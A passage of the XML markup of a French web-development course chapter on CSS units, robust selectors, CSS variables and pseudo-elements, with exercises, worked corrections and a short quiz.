              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Hauteur de ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rythme vertical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une échelle typographique en `rem` et une largeur en `ch`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html { font-size: 100%; }        /* respecte la préférence */</w:t>
        <w:br/>
        <w:t>body { font-size: 1.0625rem; }    /* 17 px par défaut */</w:t>
        <w:br/>
        <w:t>h1   { font-size: 2.25rem; }      /* 38 px */</w:t>
        <w:br/>
        <w:t>p    { max-width: 65ch; }         /* 65 caractères par ligne */</w:t>
        <w:br/>
        <w:t>.carte { padding: 1.5rem; }       /* suit la taille racine */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La largeur en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est la plus fidèle au confort de lecture : elle dépend de la police réellement utilisée et s'adapte si l'utilisateur change la taille de son texte.</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LES PIÈGES DES UNITÉS DE FENÊTRE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>100vh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> dépasse la hauteur visible sur mobile, à cause des barres d'interface. Utilisez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>100dvh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (dynamic viewport height) ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>min-height: 100svh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. Et n'utilisez jamais </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>vw</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour la typographie sans </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>clamp()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : le texte deviendrait illisible sur écran étroit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.5 Construire des sélecteurs robustes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un sélecteur robuste reste valide quand le HTML évolue. Il ne dépend ni de l'ordre des éléments, ni de la profondeur de l'arbre, ni d'un identifiant unique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux sélecteurs fragiles, deux sélecteurs robustes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Fragile : dépend de la structure */</w:t>
        <w:br/>
        <w:t>div.contenu &gt; div &gt; div &gt; p { ... }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Robuste : dépend du rôle */</w:t>
        <w:br/>
        <w:t>.article__resume { ... }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Fragile : identifiant utilisé comme style */</w:t>
        <w:br/>
        <w:t>#principal .bouton { ... }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Robuste : classe de composant */</w:t>
        <w:br/>
        <w:t>.bouton--principal { ... }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La convention BEM (bloc, élément, modificateur) n'est qu'une des possibilités, mais elle illustre le principe : nommer par rôle, éviter les descriptions de position (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>colonne-gauche</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), préférer les classes aux identifiants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une nomenclature qui se lit comme une arborescence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.carte { }</w:t>
        <w:br/>
        <w:t>.carte__titre { }</w:t>
        <w:br/>
        <w:t>.carte__image { }</w:t>
        <w:br/>
        <w:t>.carte--mise-en-avant { }</w:t>
        <w:br/>
        <w:t>.carte--compacte { }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les sélecteurs très profonds coûtent plus cher au navigateur, mais le coût reste négligeable comparé au chargement des images. La vraie raison d'éviter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>div &gt; div &gt; div</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est la maintenabilité, pas la performance.</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TROIS QUESTIONS AVANT D'ÉCRIRE UN SÉLECTEUR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Puis-je le nommer par un rôle plutôt que par une position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Que se passera-t-il si un élément est ajouté ou déplacé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Ai-je besoin d'un identifiant, ou une classe suffit-elle ?</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pseudo-classes évitent des classes d'état maintenues en JavaScript.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focus doit rester visible : c'est une exigence d'accessibilité.</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pseudo-éléments décorent ; ils ne portent pas de contenu essentiel.</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variables CSS centralisent les décisions visuelles et permettent le thème.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rem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour la typographie, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour la largeur de lecture, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>px</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour les traits.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sélecteur robuste survit aux modifications du HTML.</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Nommer par rôle, jamais par apparence ni par position.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les règles sont structurées. Le chapitre suivant s'attaque au cœur de la lisibilité : la typographie.</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10.1 — Créer un jeu de variables</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 xml:space="preserve">Créez un fichier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>variables.css</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> définissant la palette et l'échelle typographique du cours.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Définissez six couleurs, quatre espacements et trois rayons.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 xml:space="preserve">Ajoutez un thème sombre via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prefers-color-scheme</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Utilisez ces variables dans un composant bouton.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 10.2 — Réécrire des sélecteurs fragiles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   REFACTORISATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Réécrivez ces sélecteurs pour les rendre robustes.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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>div#contenu &gt; div &gt; p.intro</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ul li a:hover</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.colonne-gauche .boite .titre</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 10.3 — Construire une carte avec pseudo-éléments</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Créez une carte d'article dont l'icône de lien externe et la puce sont générées en CSS.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 xml:space="preserve">Ajoutez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>::after</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur le titre pour la flèche.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Remplacez les puces par des ronds ambre.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que le contenu reste compréhensible si le CSS est désactivé.</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10.1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:root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-primaire: #0f2e4c;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-accent: #e0a21b;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-texte: #1f2933;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-fond: #ffffff;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-bordure: #d5dee6;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-erreur: #a63a32;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-1: .5rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-2: 1rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-3: 2rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-4: 3rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --rayon-s: 4px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --rayon-m: 8px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --rayon-pilule: 999px;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>@media (prefers-color-scheme: dark) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  :root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    --couleur-texte: #e8edf1;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    --couleur-fond: #0d1620;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    --couleur-primaire: #9dc2e4;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    --couleur-bordure: #2a3b4c;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>.bouton {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: var(--espace-1) var(--espace-3);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-radius: var(--rayon-pilule);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: var(--couleur-primaire);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: var(--couleur-fond);</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le thème sombre ne redéfinit que les variables : aucune règle de composant n'est dupliquée, donc aucun risque de divergence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pour un contrôle manuel du thème, remplacez la media query par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[data-theme="dark"]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur l'élément </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et basculez l'attribut en JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 10.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un composant nommé (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.intro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.article__resume</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) suffit ; l'identifiant et la profondeur sont inutiles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>a:hover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans un contexte de liste est acceptable, mais mieux vaut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.menu a:hover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.lien:hover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> si le style doit être limité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.boite__titre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> remplace la chaîne de trois sélecteurs et reste valide quel que soit l'emplacement de la boîte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 10.3</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.carte__lien::after {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  content: " \2197";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  margin-left: .35rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-size: .9em;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.carte__liste { list-style: none; padding-left: 0; }</w:t>
        <w:br/>
        <w:t>.carte__liste li { position: relative; padding-left: 1.1rem; }</w:t>
        <w:br/>
        <w:t>.carte__liste li::before {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  content: "";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  position: absolute;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  left: 0; top: .55em;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  width: .45rem; height: .45rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-radius: 50%;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: var(--couleur-accent);</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La flèche est décorative : elle est générée en CSS et n'apparaît pas dans le texte lu par les lecteurs d'écran.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sans CSS, la liste reste une liste à puces standard et le contenu demeure intégralement lisible : c'est le test de la décoration non essentielle.</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Quelle pseudo-classe indique qu'un élément est focalisé au clavier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:hover</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:active</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:focus-visible</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:target</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Comment déclare-t-on une variable CSS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$couleur: red;</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@couleur: red;</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--couleur: red;</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var couleur = red;</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Quelle unité est la plus adaptée à une largeur de lecture confortable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px</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ch</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vw</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pt</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>var(--couleur, #000)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> si la variable n'existe pas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Une erreur de rendu</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 xml:space="preserve">Elle applique </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>#000</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Elle hérite du parent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Elle ignore la déclaration</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 xml:space="preserve">Pourquoi éviter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>div &gt; div &gt; div p</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Le navigateur ne le comprend pas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 sélecteur casse dès que la structure change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 xml:space="preserve">Il est moins spécifique que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>p</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Il empêche l'héritage</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C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:focus-visible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
